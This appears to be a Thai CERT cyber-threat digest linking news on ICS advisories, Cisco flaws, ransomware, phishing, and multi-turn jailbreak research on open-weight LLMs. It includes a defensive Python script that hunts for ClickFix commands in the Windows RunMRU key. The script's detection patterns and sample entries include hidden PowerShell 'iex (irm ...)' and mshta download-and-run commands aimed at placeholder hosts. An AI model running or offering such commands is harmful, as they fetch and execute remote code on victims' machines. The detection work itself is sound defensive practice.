NCSA Webboard
    Cyber Threat Intelligence 07 November 2025

    Cyber Security News
      Posted by NCSA_THAICERT

      Industrial Sector

      • Advantech DeviceOn/iEdge
        "Successful exploitation of these vulnerabilities could result in a denial-of-service condition, remote code execution, or an attacker reading arbitrary files."
        https://www.cisa.gov/news-events/ics-advisories/icsa-25-310-01
      • ABB FLXeon Controllers
        "Successful exploitation of these vulnerabilities could allow an attacker to take remote control of the product, insert and run arbitrary code, and crash the device being accessed."
        https://www.cisa.gov/news-events/ics-advisories/icsa-25-310-03
      • Ubia Ubox
        "Successful exploitation of this vulnerability could allow an attacker to remotely view camera feeds or modify settings."
        https://www.cisa.gov/news-events/ics-advisories/icsa-25-310-02

      New Tooling

      • OpenGuardrails: A New Open-Source Model Aims To Make AI Safer For Real-World Use
        "When you ask a large language model to summarize a policy or write code, you probably assume it will behave safely. But what happens when someone tries to trick it into leaking data or generating harmful content? That question is driving a wave of research into AI guardrails, and a new open-source project called OpenGuardrails is taking a bold step in that direction."
        https://www.helpnetsecurity.com/2025/11/06/openguardrails-open-source-make-ai-safer/
        https://github.com/openguardrails/openguardrails

      Vulnerabilities

      • Cisco Warns Of New Firewall Attack Exploiting CVE-2025-20333 And CVE-2025-20362
        "Cisco on Wednesday disclosed that it became aware of a new attack variant that's designed to target devices running Cisco Secure Firewall Adaptive Security Appliance (ASA) Software and Cisco Secure Firewall Threat Defense (FTD) Software releases that are susceptible to CVE-2025-20333 and CVE-2025-20362. "This attack can cause unpatched devices to unexpectedly reload, leading to denial-of-service (DoS) conditions," the company said in an updated advisory, urging customers to apply the updates as soon as possible."
        https://thehackernews.com/2025/11/cisco-warns-of-new-firewall-attack.html
        https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-radsupress-dos-8YF3JThh
        https://securityaffairs.com/184290/security/cisco-became-aware-of-a-new-attack-variant-against-secure-firewall-asa-and-ftd-devices.html
        https://www.theregister.com/2025/11/06/cisco_firewall_ongoing_attacks/
      • Critical Cisco UCCX Flaw Lets Attackers Run Commands As Root
        "Cisco has released security updates to patch a critical vulnerability in the Unified Contact Center Express (UCCX) software, which could enable attackers to execute commands with root privileges. The Cisco UCCX platform, described by the company as a "contact center in a box," is a software solution for managing customer interactions in call centers, supporting up to 400 agents. Tracked as CVE-2025-20354, this security flaw was discovered in the Java Remote Method Invocation (RMI) process of Cisco Unified CCX by security researcher Jahmel Harris, allowing unauthenticated attackers to execute arbitrary commands remotely with root permissions."
        https://www.bleepingcomputer.com/news/security/critical-cisco-uccx-flaw-lets-hackers-run-commands-as-root/
        https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cc-mult-vuln-gK4TFXSn
        https://www.securityweek.com/cisco-patches-critical-vulnerabilities-in-contact-center-appliance/
        https://www.helpnetsecurity.com/2025/11/06/cisco-fixes-critical-uccx-flaws-patch-asap-cve-2025-20358-cve-2025-20354/
      • Multi-Turn Attacks Expose Weaknesses In Open-Weight LLM Models
        "A new report has revealed that open-weight large language models (LLMs) have remained highly vulnerable to adaptive multi-turn adversarial attacks, even when single-turn defenses appear robust. The findings, published today by Cisco AI Defense, show that while isolated, one-off attack attempts frequently fail, persistent, multi-step conversations can achieve success rates exceeding 90% against most tested defenses."
        https://www.infosecurity-magazine.com/news/multi-turn-attacks-llm-models/
        https://arxiv.org/pdf/2511.03247

      Malware

      • An Unerring Spear: Cephalus Ransomware Analysis
        "Cephalus is a new ransomware group that first appeared in mid-June 2025. The group claims that they are motivated 100% by financial gain. Their main method of breaching organizations is by stealing credentials through Remote Desktop Protocol (RDP) accounts that do not have multi-factor authentication (MFA) enabled. Their operation is unique in that they have a form of customized ransomware that targets specific organizations, breaches them, exfiltrates their data, and then encrypts it. As of now, it is not yet known if they operate as Ransomware as a Service (RaaS) or if they have formed alliances with other ransomware groups. The name of the group comes from Cephalus, a character in Greek mythology who received an “unerring” spear from Artemis. This is seen as a sign of the group’s confidence in their success rate."
        https://asec.ahnlab.com/en/90878/
      • Ransomvibing Appears In VS Code Extensions
        "It was only a matter of time before ransomware techniques started to be included in VS Code extensions. One of the first overt examples was just discovered published to the Visual Studio Marketplace and it shows obvious signs of it being vibe coded. It utilizes GitHub as a command and control channel while also including exfiltration of encrypted files for potential extortion. This is not a sophisticated example, however, as the command and control server code was accidentally(?) included in the published extension's package along with decryption tools."
        https://secureannex.com/blog/ransomvibe/
        https://www.bleepingcomputer.com/news/security/ai-slop-ransomware-test-sneaks-on-to-vs-code-marketplace/
      • The Most Advanced ClickFix Yet?
        "ClickFix attacks have skyrocketed in the last year. This social engineering attack has established itself as a key part of the modern attacker’s toolkit, tricking victims into running malicious code on their device. As we showcased in our last webinar and at our threat briefing in London earlier this month, ClickFix is evolving fast, in terms of the web pages themselves, the delivery mechanisms by which they are sent to victims, and the nature of the payload and its execution. One particular example stood out to us in our research. So, is this the most advanced ClickFix you’ve seen?"
        https://pushsecurity.com/blog/the-most-advanced-clickfix-yet/
        https://www.bleepingcomputer.com/news/security/clickfix-malware-attacks-evolve-with-multi-os-support-video-tutorials/
      • Cavalry Werewolf Hacker Group Attacks Russian State Institutions
        "In July 2025, Doctor Web was contacted by a client from a government-owned organization within the Russian Federation with suspicions that its internal network had been compromised. This hypothesis derived from the fact that spam emails were detected as coming from one of their corporate email addresses. An investigation into the incident, conducted by our anti-virus laboratory, revealed that the institution had been subjected to a targeted attack by a hacker group, which our experts identified as Cavalry Werewolf. One of the attack’s goals was to collect confidential information as well as network configuration data."
        https://news.drweb.com/show/?i=15078&lng=en
        https://hackread.com/cavalry-werewolf-russia-government-shellnet-backdoor/
      • Phishing Campaigns “I Paid Twice” Targeting Booking.com Hotels And Customers
        "A Sekoia partner recently reported a phishing campaign targeting hospitality industry customers worldwide. The campaign was observed to involve either emails sent from a hotel’s compromised Booking.com account or messages distributed via WhatsApp. This activity proved particularly effective because the threat actor possessed customer data, including personal identifiers and reservation details, which further increased the credibility of the phishing attempts."
        https://blog.sekoia.io/phishing-campaigns-i-paid-twice-targeting-booking-com-hotels-and-customers/
        https://www.infosecurity-magazine.com/news/i-paid-twice-phishing-campaign/
      • Android Malware Steals Your Card Details And PIN To Make Instant ATM Withdrawals
        "The Polish Computer Emergency Response Team (CERT Polska) analyzed a new Android-based malware that uses NFC technology to perform unauthorized ATM cash withdrawals and drain victims’ bank accounts. Researchers found that the malware, called NGate, lets attackers withdraw cash from ATMs (Automated Teller Machines, or cash machines) using banking data exfiltrated from victims’ phones—without ever physically stealing the cards. NFC is a wireless technology that allows devices such as smartphones, payment cards, and terminals to communicate when they’re very close together. So, instead of stealing your bank card, the attackers capture NFC (Near Field Communication) activity on a mobile phone infected with the NGate malware and forward that transaction data to devices at ATMs. In NGate’s case the stolen data is sent over the network to the attackers’ servers rather than being relayed purely by radio."
        https://www.malwarebytes.com/blog/news/2025/11/android-malware-steals-your-card-details-and-pin-to-make-instant-atm-withdrawals
      • Sharing Is Scaring: The WhatsApp Screen-Sharing Scam You Didn’t See Coming
        "Scams and other threats that are doing the rounds on messaging apps like WhatsApp are a stark reminder of how easily even trusted platforms can be weaponized against us. One deceptive tactic that has gained traction recently involves tricking people into sharing their phone screens during a WhatsApp video call. The screen-sharing feature, available in WhatsApp since 2023, is increasingly being turned against the app’s users to steal their data, identities and money."
        https://www.welivesecurity.com/en/scams/sharing-is-scaring-whatsapp-screen-sharing-scam/
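The ClickFix item above describes victims being tricked into running a command themselves. What follows is an added example, not code from the Push Security or BleepingComputer write-ups, of hunting for that execution on a Windows host: it parses `reg query` output for the Run-dialog history key and flags entries that look like ClickFix launch commands. The assumption is the Win+R variant (the key path and the trailing `\1` on each value are real Windows behaviour); the indicator patterns and the sample entries are constructed for the example. `classify()` also works on shell-history lines for the macOS/Linux Terminal variants.

```python
import re

# Assumption (not stated in the article): the Windows Run-dialog variant of ClickFix.
# Commands entered via Win+R persist as REG_SZ values "<command>\1" under this key;
# the MRUList value lists the value names most-recent-first.
RUNMRU_KEY = r"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"

# Generic ClickFix-style indicators (assumed, not taken from the article; tune locally).
INDICATORS = [
    (re.compile(r"\bmshta(\.exe)?\s+\S*https?://", re.I), "mshta fetching a remote HTA"),
    (re.compile(r"\bpowershell(\.exe)?\b.*\s-(e|ec|enc|encodedcommand)\b", re.I), "encoded PowerShell"),
    (re.compile(r"\bpowershell(\.exe)?\b.*\b(iex|invoke-expression)\b", re.I), "PowerShell IEX"),
    (re.compile(r"\b(irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring)\b", re.I), "web download cmdlet"),
    (re.compile(r"\s-(w|windowstyle)\s+hidden\b", re.I), "hidden window"),
    (re.compile(r"\b(curl|wget)\b.*\|\s*(sh|bash|zsh)\b", re.I), "curl/wget piped to a shell"),
    (re.compile(r"\b(certutil|bitsadmin)\b.*https?://", re.I), "LOLBin download"),
]

# One data line of `reg query` output: "<name>    REG_SZ    <data>"
REG_LINE_RE = re.compile(r"^\s*(\S+)\s+REG_SZ\s+(.*?)\s*$")


def classify(command: str) -> list[str]:
    """Return the indicator labels that match one Run-dialog or terminal command."""
    return [label for pattern, label in INDICATORS if pattern.search(command)]


def parse_reg_query(text: str) -> list[tuple[str, str]]:
    """Parse `reg query` output for RunMRU into (value_name, command), most recent first."""
    entries, order = {}, []
    for line in text.splitlines():
        m = REG_LINE_RE.match(line)
        if not m:
            continue  # key header and blank lines
        name, data = m.groups()
        if name == "MRUList":
            order = list(data)  # e.g. "cbda": value c is the most recent
        else:
            entries[name] = data[:-2] if data.endswith("\\1") else data
    ordered = [n for n in order if n in entries] + [n for n in entries if n not in order]
    return [(n, entries[n]) for n in ordered]


def hunt_runmru(text: str) -> list[dict]:
    """Flag RunMRU entries that look like ClickFix payload launches."""
    findings = []
    for name, cmd in parse_reg_query(text):
        reasons = classify(cmd)
        if reasons:
            findings.append({"value": name, "command": cmd, "reasons": reasons})
    return findings


# Constructed sample in the shape of: reg query "HKCU\...\Explorer\RunMRU"
SAMPLE_REG_QUERY = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
    a    REG_SZ    notepad\1
    b    REG_SZ    powershell -w hidden -c "iex (irm https://captcha-check.invalid/v)"\1
    c    REG_SZ    mshta https://verify-human.invalid/a.hta\1
    d    REG_SZ    \\fileserver\share\1
    MRUList    REG_SZ    cbda
"""

if __name__ == "__main__":
    for f in hunt_runmru(SAMPLE_REG_QUERY):
        print(f"{f['value']}: {f['command']}  <- {', '.join(f['reasons'])}")
```

On a suspect host, run `reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"` and feed the output to `hunt_runmru()`. The Run dialog keeps only a short history and some lures tell the victim to clear it, so corroborate with PowerShell script-block logging (Event ID 4104) and process-creation telemetry rather than relying on the MRU alone.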

      Breaches/Hacks/Leaks

      • How a Ransomware Gang Encrypted Nevada Government's Systems
        "The State of Nevada has published an after-action report detailing how hackers breached its systems to deploy ransomware in August, and the actions taken to recover from the attack. The document is one of the few completely transparent technical reports from a federal government in the U.S. on a cybersecurity incident, describing all the steps of the attacker and setting an example on how cybersecurity incidents should be handled. The incident impacted more than 60 state government agencies and disrupted essential services, from websites and phone systems to online platforms. 28 days later, without paying a ransom, the state recovered 90% of the impacted data that was required to restore affected services."
        https://www.bleepingcomputer.com/news/security/how-a-ransomware-gang-encrypted-nevada-governments-systems/
        https://www.documentcloud.org/documents/26218568-gto-statewide-cyber-event-aar-final/
        https://therecord.media/nevada-declined-ransom-breach
        https://www.bankinfosecurity.com/report-nevada-state-hackers-evaded-detection-for-months-a-29948
        https://www.securityweek.com/nevada-ransomware-attack-started-months-before-it-was-discovered-per-report/
      • Federally Qualified Health Center Reports Ransomware Breach
        "Central Jersey Medical Center, a federally qualified health center that partners with public schools in Newark, New Jersey, is notifying an undisclosed number of people of a data breach related to an August ransomware attack. Among its other healthcare services, the Perth Amboy, New Jersey-based medical center, which has been serving the region since 2001, operates school-based health centers in Newark that offer dental, medical and mental health services to both students and adults in the community."
        https://www.bankinfosecurity.com/federally-qualified-health-center-reports-ransomware-breach-a-29950
      • Clop Ransomware Group Claims The Breach Of The Washington Post
        "The Clop Ransomware group announced the hack of the prestigious American daily newspaper The Washington Post. The cybercrime group created a page for the university on its Tor data leak site and announced it will leak the stolen data soon. The group claimed the company was breached due to its neglect of security, despite its responsibility to protect customers. “The company doesn’t care about its customers, it ignored their security!!!”"
        https://securityaffairs.com/184304/cyber-crime/clop-ransomware-group-claims-the-breach-of-the-washington-post.html
      • U.S. Congressional Budget Office Hit By Suspected Foreign Cyberattack
        "The U.S. Congressional Budget Office (CBO) confirms it suffered a cybersecurity incident after a suspected foreign hacker breached its network, potentially exposing sensitive data. In a statement shared with BleepingComputer, CBO spokesperson Caitlin Emma confirmed the "security incident" and said the agency acted quickly to contain it. "The Congressional Budget Office has identified the security incident, has taken immediate action to contain it, and has implemented additional monitoring and new security controls to further protect the agency's systems going forward," Emma told BleepingComputer."
        https://www.bleepingcomputer.com/news/security/us-congressional-budget-office-hit-by-suspected-foreign-cyberattack/

      General News

      • An X-Ray Of Modern Networks: Understanding And Mitigating IoT Security Risks
        "We analyzed 10 million devices in over 700 organizations active in October 2025 on Forescout’s Device Cloud. In this dataset, two-thirds of devices across all organizations are no longer traditional IT (workstations, laptops, servers, hypervisors, etc.). They are either network devices, such as routers and firewalls which are already a favorite target or ‘extended internet of things’ (xIoT) devices, including operational technology (OT), internet of things (IoT) and medical devices (IoMT)."
        https://www.forescout.com/blog/an-x-ray-of-modern-networks-understanding-and-mitigating-iot-security-risks/
        https://www.helpnetsecurity.com/2025/11/06/enterprise-xiot-devices-risk/
      • Humans Built The Problem, AI Just Scaled It
        "Information moves across cloud platforms, personal devices, and AI tools, often faster than security teams can track it. Proofpoint’s 2025 Data Security Landscape report shows that most organizations faced data loss last year, usually caused by their own people. With AI agents part of daily operations, security leaders are confronting risks that come from users and from the systems acting on their behalf."
        https://www.helpnetsecurity.com/2025/11/06/proofpoint-organizations-data-loss-report/
      • Retailers Are Learning To Say No To Ransom Demands
        "Ransomware remains one of the biggest operational risks for retailers, but the latest data shows a shift in how these attacks unfold. Fewer incidents now lead to data encryption, recovery costs have dropped, and businesses are bouncing back faster. Yet attackers are demanding more money, and security teams are feeling the strain. These findings come from the State of Ransomware in Retail 2025 report by Sophos, based on a global survey of 361 retail IT and cybersecurity leaders whose organizations were hit by ransomware in the past year. The results point to progress in resilience but also show where retail security programs still fall short."
        https://www.helpnetsecurity.com/2025/11/06/sophos-retail-ransomware-recovery-report/
      • ESET APT Activity Report Q2 2025–Q3 2025
        "ESET APT Activity Report Q2 2025–Q3 2025 summarizes notable activities of selected advanced persistent threat (APT) groups that were documented by ESET researchers from April through September 2025. The highlighted operations are representative of the broader landscape of threats we investigated during this period. They illustrate the key trends and developments and contain only a small fraction of the cybersecurity intelligence data provided to customers of ESET APT reports."
        https://www.welivesecurity.com/en/eset-research/eset-apt-activity-report-q2-2025-q3-2025/
        https://thehackernews.com/2025/11/trojanized-eset-installers-drop.html
        https://therecord.media/russia-sandworm-grain-wipers
        https://www.bleepingcomputer.com/news/security/sandworm-hackers-use-data-wipers-to-disrupt-ukraines-grain-sector/
        https://www.bankinfosecurity.com/russias-destructive-wiper-attacks-on-ukraine-rise-again-a-29945
        https://www.helpnetsecurity.com/2025/11/06/global-apt-activity-report-2025/
      • Why Microsegmentation Is Just a Dream For Many IT Teams
        "Microsegmentation has long been touted as the gold standard and preferred strategy for restricting hackers' lateral movement. It locks down network traffic between applications, and reduces the blast radius for breaches. Vendors say it's transformative, but if you walk into most large enterprises, you'll find it half-implemented."
        https://www.bankinfosecurity.com/microsegmentation-just-dream-for-many-teams-a-29951
      • ENISA Sectorial Threat Landscape - Public Administration
        "This ENISA sectorial threat landscape report provides an overview of the cyber threats faced by the public administration sector in the EU in 2024. Drawing on open-source information, the report highlights the key threats that impacted the sector and provides insights into typical threat types and key adversaries, to support the sector’s ongoing efforts to improve its cybersecurity posture, maturity and resilience."
        https://www.enisa.europa.eu/publications/enisa-sectorial-threat-landscape-public-administration
        https://www.infosecurity-magazine.com/news/hacktivistdriven-ddos-attacks/

      Reference
      Electronic Transactions Development Agency (ETDA)
